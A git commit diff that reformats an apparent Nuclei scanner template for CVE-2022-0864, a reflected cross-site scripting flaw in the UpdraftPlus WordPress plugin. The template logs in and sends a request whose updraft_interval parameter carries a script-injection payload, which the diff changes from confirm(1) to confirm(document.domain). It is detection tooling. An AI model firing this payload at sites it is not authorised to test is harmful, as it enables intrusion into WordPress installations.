updated format

patch-1
Ritik Chaddha 2023-04-13 19:16:52 +05:30 committed by GitHub
parent b34af2b54f
commit 15617c3330
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 9 deletions

View File

@ -1,7 +1,7 @@
id: CVE-2022-0864
info:
name: UpdraftPlus < 1.22.9 - Reflected Cross-Site Scripting
name: UpdraftPlus < 1.22.9 - Cross-Site Scripting
author: DhiyaneshDk
severity: medium
description: |
@ -10,15 +10,13 @@ info:
- https://wpscan.com/vulnerability/7337543f-4c2c-4365-aebf-3423e9d2f872
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0864
- https://wordpress.org/plugins/updraftplus
classification:
cve-id: CVE-2022-0864
metadata:
verified: "true"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-80
tags: wp-plugin,xss,wp,wordpress,authenticated,updraftplus,wpscan
tags: cve,cve2022,wp-plugin,xss,wp,wordpress,authenticated,updraftplus
requests:
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
@ -28,7 +26,7 @@ requests:
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/options-general.php?page=updraftplus&updraft_interval"></script><script>confirm(1)</script> HTTP/1.1
GET /wp-admin/options-general.php?page=updraftplus&updraft_interval"></script><script>confirm(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
@ -37,7 +35,7 @@ requests:
- type: word
part: body
words:
- '</script><script>confirm(1)</script>'
- '</script><script>confirm(document.domain)</script>'
- 'updraftplus'
condition: and